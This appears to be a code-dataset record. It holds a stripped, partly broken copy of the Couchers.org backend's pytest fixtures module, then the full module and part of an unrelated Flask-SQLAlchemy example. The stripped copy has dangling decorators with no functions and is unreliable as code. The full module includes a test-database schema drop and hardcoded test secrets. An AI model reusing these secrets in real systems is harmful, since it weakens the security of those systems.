"DROP SCHEMA public CASCADE; DROP SCHEMA IF EXISTS logging CASCADE; CREATE SCHEMA public; CREATE SCHEMA logging; CREATE EXTENSION postgis; CREATE EXTENSION pg_trgm; CREATE EXTENSION btree_gist;"
)
)
def create_schema_from_models():
"""
Create everything from the current models, not incrementally
through migrations.
"""
# create the slugify function
functions = Path(__file__).parent / "slugify.sql"
with open(functions) as f, session_scope() as session:
session.execute(text(f.read()))
Base.metadata.create_all(get_engine())
def populate_testing_resources(session):
"""
Testing version of couchers.resources.copy_resources_to_database
"""
regions = [
("AUS", "Australia"),
("CAN", "Canada"),
("CHE", "Switzerland"),
("CUB", "Cuba"),
("CXR", "Christmas Island"),
("CZE", "Czechia"),
("DEU", "Germany"),
("EGY", "Egypt"),
("ESP", "Spain"),
("EST", "Estonia"),
("FIN", "Finland"),
("FRA", "France"),
("GBR", "United Kingdom"),
("GEO", "Georgia"),
("GHA", "Ghana"),
("GRC", "Greece"),
("HKG", "Hong Kong"),
("IRL", "Ireland"),
("ISR", "Israel"),
("ITA", "Italy"),
("JPN", "Japan"),
("LAO", "Laos"),
("MEX", "Mexico"),
("MMR", "Myanmar"),
("NAM", "Namibia"),
("NLD", "Netherlands"),
("NZL", "New Zealand"),
("POL", "Poland"),
("PRK", "North Korea"),
("REU", "Réunion"),
("SGP", "Singapore"),
("SWE", "Sweden"),
("THA", "Thailand"),
("TUR", "Turkey"),
("TWN", "Taiwan"),
("USA", "United States"),
("VNM", "Vietnam"),
]
languages = [
("arb", "Arabic (Standard)"),
("deu", "German"),
("eng", "English"),
("fin", "Finnish"),
("fra", "French"),
("heb", "Hebrew"),
("hun", "Hungarian"),
("jpn", "Japanese"),
("pol", "Polish"),
("swe", "Swedish"),
("cmn", "Chinese (Mandarin)"),
]
with open(Path(__file__).parent / ".." / ".." / "resources" / "timezone_areas.sql-fake", "r") as f:
tz_sql = f.read()
for code, name in regions:
session.add(Region(code=code, name=name))
for code, name in languages:
session.add(Language(code=code, name=name))
session.execute(text(tz_sql))
def recreate_database():
"""
Connect to a running Postgres database, build it using metadata.create_all()
"""
# running in non-UTC catches some timezone errors
os.environ["TZ"] = "America/New_York"
# drop everything currently in the database
drop_all()
# create everything from the current models, not incrementally through migrations
create_schema_from_models()
with session_scope() as session:
populate_testing_resources(session)
@pytest.fixture()
def db():
"""
Pytest fixture to connect to a running Postgres database and build it using metadata.create_all()
"""
recreate_database()
def generate_user(*, make_invisible=False, **kwargs):
"""
Create a new user, return session token
The user is detached from any session, and you can access its static attributes, but you can't modify it
Use this most of the time
"""
auth = Auth()
with session_scope() as session:
# default args
username = "test_user_" + random_hex(16)
user_opts = {
"username": username,
"email": f"{username}@dev.couchers.org",
# password is just 'password'
# this is hardcoded because the password is slow to hash (so would slow down tests otherwise)
"hashed_password": b"$argon2id$v=19$m=65536,t=2,p=1$4cjGg1bRaZ10k+7XbIDmFg$tZG7JaLrkfyfO7cS233ocq7P8rf3znXR7SAfUt34kJg",
"name": username.capitalize(),
"city": "Testing city",
"hometown": "Test hometown",
"community_standing": 0.5,
"birthdate": date(year=2000, month=1, day=1),
"gender": "N/A",
"pronouns": "",
"occupation": "Tester",
"education": "UST(esting)",
"about_me": "I test things",
"my_travels": "Places",
"things_i_like": "Code",
"about_place": "My place has a lot of testing paraphenelia",
"additional_information": "I can be a bit testy",
# you need to make sure to update this logic to make sure the user is jailed/not on request
"accepted_tos": TOS_VERSION,
"accepted_community_guidelines": GUIDELINES_VERSION,
"geom": create_coordinate(40.7108, -73.9740),
"geom_radius": 100,
"onboarding_emails_sent": 1,
"last_onboarding_email_sent": now(),
"new_notifications_enabled": True,
}
for key, value in kwargs.items():
user_opts[key] = value
user = User(**user_opts)
session.add(user)
session.flush()
session.add(RegionVisited(user_id=user.id, region_code="CHE"))
session.add(RegionVisited(user_id=user.id, region_code="REU"))
session.add(RegionVisited(user_id=user.id, region_code="FIN"))
session.add(RegionLived(user_id=user.id, region_code="ESP"))
session.add(RegionLived(user_id=user.id, region_code="FRA"))
session.add(RegionLived(user_id=user.id, region_code="EST"))
session.add(LanguageAbility(user_id=user.id, language_code="fin", fluency=LanguageFluency.fluent))
session.add(LanguageAbility(user_id=user.id, language_code="fra", fluency=LanguageFluency.beginner))
# this expires the user, so now it's "dirty"
session.commit()
token, _ = create_session(_DummyContext(), session, user, False)
# deleted user aborts session creation, hence this follows and necessitates a second commit
if make_invisible:
user.is_deleted = True
session.commit()
# refresh it, undoes the expiry
session.refresh(user)
# allows detaches the user from the session, allowing its use outside this session
session.expunge(user)
return user, token
# This doubles as get_FriendRequest, since a friend request is just a pending friend relationship
class CookieMetadataPlugin(grpc.AuthMetadataPlugin):
"""
Injects the right `cookie: couchers-sesh=...` header into the metadata
"""
@contextmanager
def auth_api_session():
"""
Create an Auth API for testing
This needs to use the real server since it plays around with headers
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor)
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
auth_pb2_grpc.add_AuthServicer_to_server(Auth(), server)
server.start()
try:
with grpc.secure_channel(f"localhost:{port}", grpc.local_channel_credentials()) as channel:
metadata_interceptor = _MetadataKeeperInterceptor()
channel = grpc.intercept_channel(channel, metadata_interceptor)
yield auth_pb2_grpc.AuthStub(channel), metadata_interceptor
finally:
server.stop(None).wait()
@contextmanager
def api_session(token):
"""
Create an API for testing, uses the token for auth
"""
channel = fake_channel(token)
api_pb2_grpc.add_APIServicer_to_server(API(), channel)
yield api_pb2_grpc.APIStub(channel)
@contextmanager
def real_api_session(token):
"""
Create an API for testing, using TCP sockets, uses the token for auth
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[AuthValidatorInterceptor()])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
api_pb2_grpc.add_APIServicer_to_server(API(), server)
server.start()
call_creds = grpc.metadata_call_credentials(CookieMetadataPlugin(token))
comp_creds = grpc.composite_channel_credentials(grpc.local_channel_credentials(), call_creds)
try:
with grpc.secure_channel(f"localhost:{port}", comp_creds) as channel:
yield api_pb2_grpc.APIStub(channel)
finally:
server.stop(None).wait()
@contextmanager
def real_admin_session(token):
"""
Create a Admin service for testing, using TCP sockets, uses the token for auth
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[AuthValidatorInterceptor()])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
admin_pb2_grpc.add_AdminServicer_to_server(Admin(), server)
server.start()
call_creds = grpc.metadata_call_credentials(CookieMetadataPlugin(token))
comp_creds = grpc.composite_channel_credentials(grpc.local_channel_credentials(), call_creds)
try:
with grpc.secure_channel(f"localhost:{port}", comp_creds) as channel:
yield admin_pb2_grpc.AdminStub(channel)
finally:
server.stop(None).wait()
@contextmanager
def real_jail_session(token):
"""
Create a Jail service for testing, using TCP sockets, uses the token for auth
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[AuthValidatorInterceptor()])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
jail_pb2_grpc.add_JailServicer_to_server(Jail(), server)
server.start()
call_creds = grpc.metadata_call_credentials(CookieMetadataPlugin(token))
comp_creds = grpc.composite_channel_credentials(grpc.local_channel_credentials(), call_creds)
try:
with grpc.secure_channel(f"localhost:{port}", comp_creds) as channel:
yield jail_pb2_grpc.JailStub(channel)
finally:
server.stop(None).wait()
@contextmanager
def conversations_session(token):
"""
Create a Conversations API for testing, uses the token for auth
"""
channel = fake_channel(token)
conversations_pb2_grpc.add_ConversationsServicer_to_server(Conversations(), channel)
yield conversations_pb2_grpc.ConversationsStub(channel)
@contextmanager
def requests_session(token):
"""
Create a Requests API for testing, uses the token for auth
"""
channel = fake_channel(token)
requests_pb2_grpc.add_RequestsServicer_to_server(Requests(), channel)
yield requests_pb2_grpc.RequestsStub(channel)
@contextmanager
@contextmanager
@contextmanager
@contextmanager
def real_stripe_session():
"""
Create a Stripe service for testing, using TCP sockets
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[AuthValidatorInterceptor()])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
stripe_pb2_grpc.add_StripeServicer_to_server(Stripe(), server)
server.start()
creds = grpc.local_channel_credentials()
try:
with grpc.secure_channel(f"localhost:{port}", creds) as channel:
yield stripe_pb2_grpc.StripeStub(channel)
finally:
server.stop(None).wait()
@contextmanager
@contextmanager
@contextmanager
@contextmanager
@contextmanager
@contextmanager
def account_session(token):
"""
Create a Account API for testing, uses the token for auth
"""
channel = fake_channel(token)
account_pb2_grpc.add_AccountServicer_to_server(Account(), channel)
yield account_pb2_grpc.AccountStub(channel)
@contextmanager
def search_session(token):
"""
Create a Search API for testing, uses the token for auth
"""
channel = fake_channel(token)
search_pb2_grpc.add_SearchServicer_to_server(Search(), channel)
yield search_pb2_grpc.SearchStub(channel)
@contextmanager
def references_session(token):
"""
Create a References API for testing, uses the token for auth
"""
channel = fake_channel(token)
references_pb2_grpc.add_ReferencesServicer_to_server(References(), channel)
yield references_pb2_grpc.ReferencesStub(channel)
@contextmanager
@contextmanager
@contextmanager
@contextmanager
@contextmanager
def media_session(bearer_token):
"""
Create a fresh Media API for testing, uses the bearer token for media auth
"""
media_auth_interceptor = get_media_auth_interceptor(bearer_token)
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[media_auth_interceptor])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
servicer = Media()
media_pb2_grpc.add_MediaServicer_to_server(servicer, server)
server.start()
call_creds = grpc.access_token_call_credentials(bearer_token)
comp_creds = grpc.composite_channel_credentials(grpc.local_channel_credentials(), call_creds)
try:
with grpc.secure_channel(f"localhost:{port}", comp_creds) as channel:
yield media_pb2_grpc.MediaStub(channel)
finally:
server.stop(None).wait()
@pytest.fixture()
@pytest.fixture
| 32.793609 | 210 | 0.683775 | import os
from concurrent import futures
from contextlib import contextmanager
from datetime import date
from pathlib import Path
from unittest.mock import patch
import grpc
import pytest
from sqlalchemy.sql import or_, text
from couchers.config import config
from couchers.constants import GUIDELINES_VERSION, TOS_VERSION
from couchers.crypto import random_hex
from couchers.db import get_engine, session_scope
from couchers.interceptors import AuthValidatorInterceptor, _try_get_and_update_user_details
from couchers.models import (
Base,
FriendRelationship,
FriendStatus,
Language,
LanguageAbility,
LanguageFluency,
Region,
RegionLived,
RegionVisited,
User,
UserBlock,
UserSession,
)
from couchers.servicers.account import Account
from couchers.servicers.admin import Admin
from couchers.servicers.api import API
from couchers.servicers.auth import Auth, create_session
from couchers.servicers.blocking import Blocking
from couchers.servicers.bugs import Bugs
from couchers.servicers.communities import Communities
from couchers.servicers.conversations import Conversations
from couchers.servicers.discussions import Discussions
from couchers.servicers.donations import Donations, Stripe
from couchers.servicers.events import Events
from couchers.servicers.groups import Groups
from couchers.servicers.jail import Jail
from couchers.servicers.media import Media, get_media_auth_interceptor
from couchers.servicers.notifications import Notifications
from couchers.servicers.pages import Pages
from couchers.servicers.references import References
from couchers.servicers.reporting import Reporting
from couchers.servicers.requests import Requests
from couchers.servicers.resources import Resources
from couchers.servicers.search import Search
from couchers.servicers.threads import Threads
from couchers.sql import couchers_select as select
from couchers.utils import create_coordinate, now
from proto import (
account_pb2_grpc,
admin_pb2_grpc,
api_pb2_grpc,
auth_pb2_grpc,
blocking_pb2_grpc,
bugs_pb2_grpc,
communities_pb2_grpc,
conversations_pb2_grpc,
discussions_pb2_grpc,
donations_pb2_grpc,
events_pb2_grpc,
groups_pb2_grpc,
jail_pb2_grpc,
media_pb2_grpc,
notifications_pb2_grpc,
pages_pb2_grpc,
references_pb2_grpc,
reporting_pb2_grpc,
requests_pb2_grpc,
resources_pb2_grpc,
search_pb2_grpc,
stripe_pb2_grpc,
threads_pb2_grpc,
)
def drop_all():
"""drop everything currently in the database"""
with session_scope() as session:
# postgis is required for all the Geographic Information System (GIS) stuff
# pg_trgm is required for trigram based search
# btree_gist is required for gist-based exclusion constraints
session.execute(
text(
"DROP SCHEMA public CASCADE; DROP SCHEMA IF EXISTS logging CASCADE; CREATE SCHEMA public; CREATE SCHEMA logging; CREATE EXTENSION postgis; CREATE EXTENSION pg_trgm; CREATE EXTENSION btree_gist;"
)
)
def create_schema_from_models():
"""
Create everything from the current models, not incrementally
through migrations.
"""
# create the slugify function
functions = Path(__file__).parent / "slugify.sql"
with open(functions) as f, session_scope() as session:
session.execute(text(f.read()))
Base.metadata.create_all(get_engine())
def populate_testing_resources(session):
"""
Testing version of couchers.resources.copy_resources_to_database
"""
regions = [
("AUS", "Australia"),
("CAN", "Canada"),
("CHE", "Switzerland"),
("CUB", "Cuba"),
("CXR", "Christmas Island"),
("CZE", "Czechia"),
("DEU", "Germany"),
("EGY", "Egypt"),
("ESP", "Spain"),
("EST", "Estonia"),
("FIN", "Finland"),
("FRA", "France"),
("GBR", "United Kingdom"),
("GEO", "Georgia"),
("GHA", "Ghana"),
("GRC", "Greece"),
("HKG", "Hong Kong"),
("IRL", "Ireland"),
("ISR", "Israel"),
("ITA", "Italy"),
("JPN", "Japan"),
("LAO", "Laos"),
("MEX", "Mexico"),
("MMR", "Myanmar"),
("NAM", "Namibia"),
("NLD", "Netherlands"),
("NZL", "New Zealand"),
("POL", "Poland"),
("PRK", "North Korea"),
("REU", "Réunion"),
("SGP", "Singapore"),
("SWE", "Sweden"),
("THA", "Thailand"),
("TUR", "Turkey"),
("TWN", "Taiwan"),
("USA", "United States"),
("VNM", "Vietnam"),
]
languages = [
("arb", "Arabic (Standard)"),
("deu", "German"),
("eng", "English"),
("fin", "Finnish"),
("fra", "French"),
("heb", "Hebrew"),
("hun", "Hungarian"),
("jpn", "Japanese"),
("pol", "Polish"),
("swe", "Swedish"),
("cmn", "Chinese (Mandarin)"),
]
with open(Path(__file__).parent / ".." / ".." / "resources" / "timezone_areas.sql-fake", "r") as f:
tz_sql = f.read()
for code, name in regions:
session.add(Region(code=code, name=name))
for code, name in languages:
session.add(Language(code=code, name=name))
session.execute(text(tz_sql))
def recreate_database():
"""
Connect to a running Postgres database, build it using metadata.create_all()
"""
# running in non-UTC catches some timezone errors
os.environ["TZ"] = "America/New_York"
# drop everything currently in the database
drop_all()
# create everything from the current models, not incrementally through migrations
create_schema_from_models()
with session_scope() as session:
populate_testing_resources(session)
@pytest.fixture()
def db():
"""
Pytest fixture to connect to a running Postgres database and build it using metadata.create_all()
"""
recreate_database()
def generate_user(*, make_invisible=False, **kwargs):
"""
Create a new user, return session token
The user is detached from any session, and you can access its static attributes, but you can't modify it
Use this most of the time
"""
auth = Auth()
with session_scope() as session:
# default args
username = "test_user_" + random_hex(16)
user_opts = {
"username": username,
"email": f"{username}@dev.couchers.org",
# password is just 'password'
# this is hardcoded because the password is slow to hash (so would slow down tests otherwise)
"hashed_password": b"$argon2id$v=19$m=65536,t=2,p=1$4cjGg1bRaZ10k+7XbIDmFg$tZG7JaLrkfyfO7cS233ocq7P8rf3znXR7SAfUt34kJg",
"name": username.capitalize(),
"city": "Testing city",
"hometown": "Test hometown",
"community_standing": 0.5,
"birthdate": date(year=2000, month=1, day=1),
"gender": "N/A",
"pronouns": "",
"occupation": "Tester",
"education": "UST(esting)",
"about_me": "I test things",
"my_travels": "Places",
"things_i_like": "Code",
"about_place": "My place has a lot of testing paraphenelia",
"additional_information": "I can be a bit testy",
# you need to make sure to update this logic to make sure the user is jailed/not on request
"accepted_tos": TOS_VERSION,
"accepted_community_guidelines": GUIDELINES_VERSION,
"geom": create_coordinate(40.7108, -73.9740),
"geom_radius": 100,
"onboarding_emails_sent": 1,
"last_onboarding_email_sent": now(),
"new_notifications_enabled": True,
}
for key, value in kwargs.items():
user_opts[key] = value
user = User(**user_opts)
session.add(user)
session.flush()
session.add(RegionVisited(user_id=user.id, region_code="CHE"))
session.add(RegionVisited(user_id=user.id, region_code="REU"))
session.add(RegionVisited(user_id=user.id, region_code="FIN"))
session.add(RegionLived(user_id=user.id, region_code="ESP"))
session.add(RegionLived(user_id=user.id, region_code="FRA"))
session.add(RegionLived(user_id=user.id, region_code="EST"))
session.add(LanguageAbility(user_id=user.id, language_code="fin", fluency=LanguageFluency.fluent))
session.add(LanguageAbility(user_id=user.id, language_code="fra", fluency=LanguageFluency.beginner))
# this expires the user, so now it's "dirty"
session.commit()
class _DummyContext:
def invocation_metadata(self):
return {}
token, _ = create_session(_DummyContext(), session, user, False)
# deleted user aborts session creation, hence this follows and necessitates a second commit
if make_invisible:
user.is_deleted = True
session.commit()
# refresh it, undoes the expiry
session.refresh(user)
# allows detaches the user from the session, allowing its use outside this session
session.expunge(user)
return user, token
def get_user_id_and_token(session, username):
user_id = session.execute(select(User).where(User.username == username)).scalar_one().id
token = session.execute(select(UserSession).where(UserSession.user_id == user_id)).scalar_one().token
return user_id, token
def make_friends(user1, user2):
with session_scope() as session:
friend_relationship = FriendRelationship(
from_user_id=user1.id,
to_user_id=user2.id,
status=FriendStatus.accepted,
)
session.add(friend_relationship)
def make_user_block(user1, user2):
with session_scope() as session:
user_block = UserBlock(
blocking_user_id=user1.id,
blocked_user_id=user2.id,
)
session.add(user_block)
session.commit()
def make_user_invisible(user_id):
with session_scope() as session:
session.execute(select(User).where(User.id == user_id)).scalar_one().is_banned = True
# This doubles as get_FriendRequest, since a friend request is just a pending friend relationship
def get_friend_relationship(user1, user2):
with session_scope() as session:
friend_relationship = session.execute(
select(FriendRelationship).where(
or_(
(FriendRelationship.from_user_id == user1.id and FriendRelationship.to_user_id == user2.id),
(FriendRelationship.from_user_id == user2.id and FriendRelationship.to_user_id == user1.id),
)
)
).scalar_one_or_none()
session.expunge(friend_relationship)
return friend_relationship
class CookieMetadataPlugin(grpc.AuthMetadataPlugin):
"""
Injects the right `cookie: couchers-sesh=...` header into the metadata
"""
def __init__(self, token):
self.token = token
def __call__(self, context, callback):
callback((("cookie", f"couchers-sesh={self.token}"),), None)
class FakeRpcError(grpc.RpcError):
def __init__(self, code, details):
self._code = code
self._details = details
def code(self):
return self._code
def details(self):
return self._details
class FakeChannel:
def __init__(self, user_id=None):
self.handlers = {}
self.user_id = user_id
def abort(self, code, details):
raise FakeRpcError(code, details)
def add_generic_rpc_handlers(self, generic_rpc_handlers):
from grpc._server import _validate_generic_rpc_handlers
_validate_generic_rpc_handlers(generic_rpc_handlers)
self.handlers.update(generic_rpc_handlers[0]._method_handlers)
def unary_unary(self, uri, request_serializer, response_deserializer):
handler = self.handlers[uri]
def fake_handler(request):
# Do a full serialization cycle on the request and the
# response to catch accidental use of unserializable data.
request = handler.request_deserializer(request_serializer(request))
response = handler.unary_unary(request, self)
return response_deserializer(handler.response_serializer(response))
return fake_handler
@contextmanager
def auth_api_session():
"""
Create an Auth API for testing
This needs to use the real server since it plays around with headers
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor)
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
auth_pb2_grpc.add_AuthServicer_to_server(Auth(), server)
server.start()
try:
with grpc.secure_channel(f"localhost:{port}", grpc.local_channel_credentials()) as channel:
class _MetadataKeeperInterceptor(grpc.UnaryUnaryClientInterceptor):
def __init__(self):
self.latest_headers = {}
def intercept_unary_unary(self, continuation, client_call_details, request):
call = continuation(client_call_details, request)
self.latest_headers = dict(call.initial_metadata())
return call
metadata_interceptor = _MetadataKeeperInterceptor()
channel = grpc.intercept_channel(channel, metadata_interceptor)
yield auth_pb2_grpc.AuthStub(channel), metadata_interceptor
finally:
server.stop(None).wait()
@contextmanager
def api_session(token):
"""
Create an API for testing, uses the token for auth
"""
channel = fake_channel(token)
api_pb2_grpc.add_APIServicer_to_server(API(), channel)
yield api_pb2_grpc.APIStub(channel)
@contextmanager
def real_api_session(token):
"""
Create an API for testing, using TCP sockets, uses the token for auth
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[AuthValidatorInterceptor()])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
api_pb2_grpc.add_APIServicer_to_server(API(), server)
server.start()
call_creds = grpc.metadata_call_credentials(CookieMetadataPlugin(token))
comp_creds = grpc.composite_channel_credentials(grpc.local_channel_credentials(), call_creds)
try:
with grpc.secure_channel(f"localhost:{port}", comp_creds) as channel:
yield api_pb2_grpc.APIStub(channel)
finally:
server.stop(None).wait()
@contextmanager
def real_admin_session(token):
"""
Create a Admin service for testing, using TCP sockets, uses the token for auth
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[AuthValidatorInterceptor()])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
admin_pb2_grpc.add_AdminServicer_to_server(Admin(), server)
server.start()
call_creds = grpc.metadata_call_credentials(CookieMetadataPlugin(token))
comp_creds = grpc.composite_channel_credentials(grpc.local_channel_credentials(), call_creds)
try:
with grpc.secure_channel(f"localhost:{port}", comp_creds) as channel:
yield admin_pb2_grpc.AdminStub(channel)
finally:
server.stop(None).wait()
@contextmanager
def real_jail_session(token):
"""
Create a Jail service for testing, using TCP sockets, uses the token for auth
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[AuthValidatorInterceptor()])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
jail_pb2_grpc.add_JailServicer_to_server(Jail(), server)
server.start()
call_creds = grpc.metadata_call_credentials(CookieMetadataPlugin(token))
comp_creds = grpc.composite_channel_credentials(grpc.local_channel_credentials(), call_creds)
try:
with grpc.secure_channel(f"localhost:{port}", comp_creds) as channel:
yield jail_pb2_grpc.JailStub(channel)
finally:
server.stop(None).wait()
def fake_channel(token):
user_id, jailed, is_superuser = _try_get_and_update_user_details(token, is_api_key=False)
return FakeChannel(user_id=user_id)
@contextmanager
def conversations_session(token):
"""
Create a Conversations API for testing, uses the token for auth
"""
channel = fake_channel(token)
conversations_pb2_grpc.add_ConversationsServicer_to_server(Conversations(), channel)
yield conversations_pb2_grpc.ConversationsStub(channel)
@contextmanager
def requests_session(token):
"""
Create a Requests API for testing, uses the token for auth
"""
channel = fake_channel(token)
requests_pb2_grpc.add_RequestsServicer_to_server(Requests(), channel)
yield requests_pb2_grpc.RequestsStub(channel)
@contextmanager
def threads_session(token):
channel = fake_channel(token)
threads_pb2_grpc.add_ThreadsServicer_to_server(Threads(), channel)
yield threads_pb2_grpc.ThreadsStub(channel)
@contextmanager
def discussions_session(token):
channel = fake_channel(token)
discussions_pb2_grpc.add_DiscussionsServicer_to_server(Discussions(), channel)
yield discussions_pb2_grpc.DiscussionsStub(channel)
@contextmanager
def donations_session(token):
channel = fake_channel(token)
donations_pb2_grpc.add_DonationsServicer_to_server(Donations(), channel)
yield donations_pb2_grpc.DonationsStub(channel)
@contextmanager
def real_stripe_session():
"""
Create a Stripe service for testing, using TCP sockets
"""
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[AuthValidatorInterceptor()])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
stripe_pb2_grpc.add_StripeServicer_to_server(Stripe(), server)
server.start()
creds = grpc.local_channel_credentials()
try:
with grpc.secure_channel(f"localhost:{port}", creds) as channel:
yield stripe_pb2_grpc.StripeStub(channel)
finally:
server.stop(None).wait()
@contextmanager
def pages_session(token):
channel = fake_channel(token)
pages_pb2_grpc.add_PagesServicer_to_server(Pages(), channel)
yield pages_pb2_grpc.PagesStub(channel)
@contextmanager
def communities_session(token):
channel = fake_channel(token)
communities_pb2_grpc.add_CommunitiesServicer_to_server(Communities(), channel)
yield communities_pb2_grpc.CommunitiesStub(channel)
@contextmanager
def groups_session(token):
channel = fake_channel(token)
groups_pb2_grpc.add_GroupsServicer_to_server(Groups(), channel)
yield groups_pb2_grpc.GroupsStub(channel)
@contextmanager
def blocking_session(token):
channel = fake_channel(token)
blocking_pb2_grpc.add_BlockingServicer_to_server(Blocking(), channel)
yield blocking_pb2_grpc.BlockingStub(channel)
@contextmanager
def notifications_session(token):
channel = fake_channel(token)
notifications_pb2_grpc.add_NotificationsServicer_to_server(Notifications(), channel)
yield notifications_pb2_grpc.NotificationsStub(channel)
@contextmanager
def account_session(token):
"""
Create a Account API for testing, uses the token for auth
"""
channel = fake_channel(token)
account_pb2_grpc.add_AccountServicer_to_server(Account(), channel)
yield account_pb2_grpc.AccountStub(channel)
@contextmanager
def search_session(token):
"""
Create a Search API for testing, uses the token for auth
"""
channel = fake_channel(token)
search_pb2_grpc.add_SearchServicer_to_server(Search(), channel)
yield search_pb2_grpc.SearchStub(channel)
@contextmanager
def references_session(token):
"""
Create a References API for testing, uses the token for auth
"""
channel = fake_channel(token)
references_pb2_grpc.add_ReferencesServicer_to_server(References(), channel)
yield references_pb2_grpc.ReferencesStub(channel)
@contextmanager
def reporting_session(token):
channel = fake_channel(token)
reporting_pb2_grpc.add_ReportingServicer_to_server(Reporting(), channel)
yield reporting_pb2_grpc.ReportingStub(channel)
@contextmanager
def events_session(token):
channel = fake_channel(token)
events_pb2_grpc.add_EventsServicer_to_server(Events(), channel)
yield events_pb2_grpc.EventsStub(channel)
@contextmanager
def bugs_session(token=None):
if token:
channel = fake_channel(token)
else:
channel = FakeChannel()
bugs_pb2_grpc.add_BugsServicer_to_server(Bugs(), channel)
yield bugs_pb2_grpc.BugsStub(channel)
@contextmanager
def resources_session():
channel = FakeChannel()
resources_pb2_grpc.add_ResourcesServicer_to_server(Resources(), channel)
yield resources_pb2_grpc.ResourcesStub(channel)
@contextmanager
def media_session(bearer_token):
"""
Create a fresh Media API for testing, uses the bearer token for media auth
"""
media_auth_interceptor = get_media_auth_interceptor(bearer_token)
with futures.ThreadPoolExecutor(1) as executor:
server = grpc.server(executor, interceptors=[media_auth_interceptor])
port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
servicer = Media()
media_pb2_grpc.add_MediaServicer_to_server(servicer, server)
server.start()
call_creds = grpc.access_token_call_credentials(bearer_token)
comp_creds = grpc.composite_channel_credentials(grpc.local_channel_credentials(), call_creds)
try:
with grpc.secure_channel(f"localhost:{port}", comp_creds) as channel:
yield media_pb2_grpc.MediaStub(channel)
finally:
server.stop(None).wait()
@pytest.fixture()
def testconfig():
prevconfig = config.copy()
config.clear()
config.update(prevconfig)
config["IN_TEST"] = True
config["DEV"] = True
config["VERSION"] = "testing_version"
config["BASE_URL"] = "http://localhost:3000"
config["COOKIE_DOMAIN"] = "localhost"
config["ENABLE_SMS"] = False
config["SMS_SENDER_ID"] = "invalid"
config["ENABLE_EMAIL"] = False
config["NOTIFICATION_EMAIL_SENDER"] = "Couchers.org"
config["NOTIFICATION_EMAIL_ADDRESS"] = "notify@couchers.org.invalid"
config["NOTIFICATION_EMAIL_PREFIX"] = "[TEST] "
config["REPORTS_EMAIL_RECIPIENT"] = "reports@couchers.org.invalid"
config["CONTRIBUTOR_FORM_EMAIL_RECIPIENT"] = "forms@couchers.org.invalid"
config["ENABLE_DONATIONS"] = False
config["STRIPE_API_KEY"] = ""
config["STRIPE_WEBHOOK_SECRET"] = ""
config["STRIPE_RECURRING_PRODUCT_ID"] = ""
config["SMTP_HOST"] = "localhost"
config["SMTP_PORT"] = 587
config["SMTP_USERNAME"] = "username"
config["SMTP_PASSWORD"] = "password"
config["ENABLE_MEDIA"] = True
config["MEDIA_SERVER_SECRET_KEY"] = bytes.fromhex(
"91e29bbacc74fa7e23c5d5f34cca5015cb896e338a620003de94a502a461f4bc"
)
config["MEDIA_SERVER_BEARER_TOKEN"] = "c02d383897d3b82774ced09c9e17802164c37e7e105d8927553697bf4550e91e"
config["MEDIA_SERVER_BASE_URL"] = "http://127.0.0.1:5000"
config["BUG_TOOL_ENABLED"] = False
config["BUG_TOOL_GITHUB_REPO"] = "org/repo"
config["BUG_TOOL_GITHUB_USERNAME"] = "user"
config["BUG_TOOL_GITHUB_TOKEN"] = "token"
config["MAILCHIMP_ENABLED"] = False
config["MAILCHIMP_API_KEY"] = "f..."
config["MAILCHIMP_DC"] = "us10"
config["MAILCHIMP_LIST_ID"] = "b..."
yield None
config.clear()
config.update(prevconfig)
@pytest.fixture
def fast_passwords():
# password hashing, by design, takes a lot of time, which slows down the tests. here we jump through some hoops to
# make this fast by removing the hashing step
def fast_hash(password: bytes) -> bytes:
return b"fake hash:" + password
def fast_verify(hashed: bytes, password: bytes) -> bool:
return hashed == fast_hash(password)
with patch("couchers.crypto.nacl.pwhash.verify", fast_verify):
with patch("couchers.crypto.nacl.pwhash.str", fast_hash):
yield
| 7,306 | 55 | 921 |
27e2b7dcc45a15d15fd62186d87eade382c87799 | 1,116 | py | Python | flask_project/sqlalchemy/hello_v22.py | FatemehRahmanzadeh/flask_project_maktab | 6e9f28d67695dde3fd4f8ed59d3a507cb6f5a5ec | [
"Apache-2.0"
] | 2 | 2021-08-14T09:10:39.000Z | 2021-08-24T05:05:43.000Z | flask_project/sqlalchemy/hello_v22.py | FatemehRahmanzadeh/flask_project_maktab | 6e9f28d67695dde3fd4f8ed59d3a507cb6f5a5ec | [
"Apache-2.0"
] | null | null | null | flask_project/sqlalchemy/hello_v22.py | FatemehRahmanzadeh/flask_project_maktab | 6e9f28d67695dde3fd4f8ed59d3a507cb6f5a5ec | [
"Apache-2.0"
] | 20 | 2021-08-13T11:29:31.000Z | 2021-09-04T17:53:57.000Z | from datetime import datetime
from flask import Flask, render_template, request
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///relation_hello_v22.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
student_identifier = db.Table('student_identifier',
db.Column('class_id', db.Integer, db.ForeignKey('classes.class_id')),
db.Column('user_id', db.Integer, db.ForeignKey('students.user_id'))
)
# s = Student()
# c = Class()
